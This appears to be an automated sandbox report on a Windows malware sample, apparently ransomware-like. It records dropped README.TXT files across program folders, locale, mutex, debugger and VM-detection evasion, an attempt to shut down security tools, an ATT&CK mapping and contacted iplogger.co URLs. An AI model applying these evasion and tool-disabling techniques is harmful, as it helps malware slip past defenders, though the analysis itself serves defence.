Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000087\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000088\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000099\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000098\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000101\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000104\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000105\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000106\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000107\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000108\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000113\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000117\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000118\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000119\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000120\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000122\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000123\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000124\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000125\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000128\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000129\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000130\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000131\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000132\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000135\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000137\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000138\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000139\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000140\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000141\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000142\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000144\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000145\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\limited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\unlimited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\DataType\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\Part\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\Data Sources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\MSMAPI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\ole db\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EURO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\GRPHFLT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\MSClientDataMgr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\win_gui.exe.exeEvasive API call chain: GetLocaleInfo, StrStr, ExitProcessgraph_0-72517
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\win_gui.exe.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-72428
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7BE8 rdtsc 0_2_005C7BE8
Source: C:\Users\user\Desktop\win_gui.exe.exeWindow / User API: threadDelayed 8189Jump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C812D InterlockedIncrement,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,FindNextFileW,FindClose,InterlockedDecrement,Sleep,Sleep,0_2_005C812D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9F53 FindFirstFileW,FindClose,0_2_005C9F53
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00675337 FindFirstFileExA,0_2_00675337
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9585 GetEnvironmentVariableW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,CreateDirectoryW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,GetModuleFileNameW,CopyFileW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CreateProcessW,ExitProcess,0_2_005C9585
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA715 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,lstrlenW,lstrlenW,0_2_005CA715
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C8C94 GetSystemInfo,CreateThread,CreateThread,0_2_005C8C94
Source: win_gui.exe.exe, 00000000.00000003.2036416094.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: win_gui.exe.exe, 00000000.00000003.2076933486.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.000000000158E000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2450063743.0000000001666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\win_gui.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-72433
Source: C:\Users\user\Desktop\win_gui.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-72524
Source: C:\Users\user\Desktop\win_gui.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-72521
Source: C:\Users\user\Desktop\win_gui.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-72538
Source: C:\Users\user\Desktop\win_gui.exe.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7BE8 rdtsc 0_2_005C7BE8
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D2521 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005D2521
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA0B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcessId,GetEnvironmentVariableW,FreeLibrary,0_2_005CA0B9
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00668E2A mov eax, dword ptr fs:[00000030h]0_2_00668E2A
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C55DF GetProcessHeap,MultiByteToWideChar,WSAStartup,GetComputerNameW,InitializeCriticalSection,CreateMutexA,WaitForSingleObject,ExitProcess,Sleep,Sleep,Sleep,GetMessageW,TranslateMessage,DispatchMessageW,GetMessageW,0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D2521 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005D2521
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D26B5 SetUnhandledExceptionFilter,0_2_005D26B5
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D29CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005D29CF
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00674EEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00674EEB

HIPS / PFW / Operating System Protection Evasion

barindex
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Source: C:\Users\user\Desktop\win_gui.exe.exeMessage posted: Message id: QUERYENDSESSIONJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C6CB5 GetComputerNameW,lstrcatW,lstrlenW,GetUserNameW,LookupAccountNameW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,BuildTrusteeWithSidW,InitializeCriticalSection,0_2_005C6CB5
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9E62 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005C9E62
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D27E4 cpuid 0_2_005D27E4
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: GetLocaleInfoW,MessageBoxA,ExitProcess,0_2_005CABD1
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\COMEBaDYJEZtPnCPYFIRcLwBAtysmSXYTUEGiPYFhoKwjEtYOPojCACXlzyCfS\FsUpAxNjedWpMOXaF.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Users\user\Desktop\win_gui.exe.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D23FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005D23FC
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C6CB5 GetComputerNameW,lstrcatW,lstrlenW,GetUserNameW,LookupAccountNameW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,BuildTrusteeWithSidW,InitializeCriticalSection,0_2_005C6CB5
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9EBC GetVersionExW,0_2_005C9EBC
Source: C:\Users\user\Desktop\win_gui.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C618D GlobalAlloc,WSASocketW,GlobalFree,bind,closesocket,CreateIoCompletionPort,0_2_005C618D

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		21
Input Capture		1
System Time Discovery		2
Taint Shared Content		1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium2
Data Encrypted for Impact
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol21
Input Capture		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager4
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS35
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Masquerading		LSA Secrets1
Network Share Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Query Registry		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync31
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
System Network Configuration Discovery		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
win_gui.exe.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://iplogger.co/fests0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrent50%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrente0%Avira URL Cloudsafe
https://iplogger.co/ram0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrent;0%Avira URL Cloudsafe
https://iplogger.co/0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrentgb0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrent90%Avira URL Cloudsafe
https://iplogger.co/ces0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrentG0%Avira URL Cloudsafe
http://utox.org0%Avira URL Cloudsafe
https://iplogger.co/155qJ4.torrent0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
iplogger.co
172.67.167.249
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://iplogger.co/155qJ4.torrentfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://iplogger.co/ceswin_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://iplogger.co/155qJ4.torrent9win_gui.exe.exe, 00000000.00000003.2450063743.000000000163A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.000000000162D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.000000000163D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.openssl.org/docs/faq.htmlwin_gui.exe.exefalse
      		high
      https://iplogger.co/155qJ4.torrent;win_gui.exe.exe, 00000000.00000002.4487317189.00000000082CB000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.oracle.com/hotspot/jdk/jfr.jar.0.drfalse
        		high
        http://www.oracle.com/hotspot/jfr-info/jfr.jar.0.drfalse
          		high
          https://iplogger.co/155qJ4.torrentewin_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481037911.00000000012FB000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://javax.xml.transform.sax.SAXTransformerFactory/featurejfr.jar.0.drfalse
            		high
            https://iplogger.co/155qJ4.torrentGwin_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://iplogger.co/155qJ4.torrentgbwin_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://iplogger.co/festswin_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://iplogger.co/ramwin_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/jfr.jar.0.drfalse
              		high
              https://iplogger.co/win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001651000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4482295362.0000000005530000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://iplogger.co/155qJ4.torrent5win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
